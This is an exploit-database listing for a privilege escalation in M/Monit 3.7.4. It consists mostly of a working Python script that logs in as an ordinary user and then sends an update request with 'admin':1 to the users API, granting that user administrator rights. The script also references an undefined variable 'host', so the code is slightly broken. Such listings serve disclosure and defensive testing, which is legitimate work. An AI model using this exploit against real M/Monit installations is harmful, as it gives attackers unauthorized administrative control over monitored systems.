M/Monit 3.7.4 Privilege Escalation

2020.11.22
Credit: Dolev Farhi
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Title: M/Monit 3.7.4 - Privilege Escalation # Author: Dolev Farhi # Date: 2020-07-09 # Vendor Homepage: https://mmonit.com/ # Version : 3.7.4 import sys import requests url = 'http://your_ip_here:8080' username = 'test' password = 'test123' sess = requests.Session() sess.get(host) def login(): print('Attempting to login...') data = { 'z_username':username, 'z_password':password } headers = { 'Content-Type':'application/x-www-form-urlencoded' } resp = sess.post(url + '/z_security_check', data=data, headers=headers) if resp.ok: print('Logged in successfully.') else: print('Could not login.') sys.exit(1) def privesc(): data = { 'uname':username, 'fullname':username, 'password':password, 'admin':1 } resp = sess.post(url + '/api/1/admin/users/update', data=data) if resp.ok: print('Escalated to administrator.') else: print('Unable to escalate to administrator.') return if __name__ == '__main__': login() privesc()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top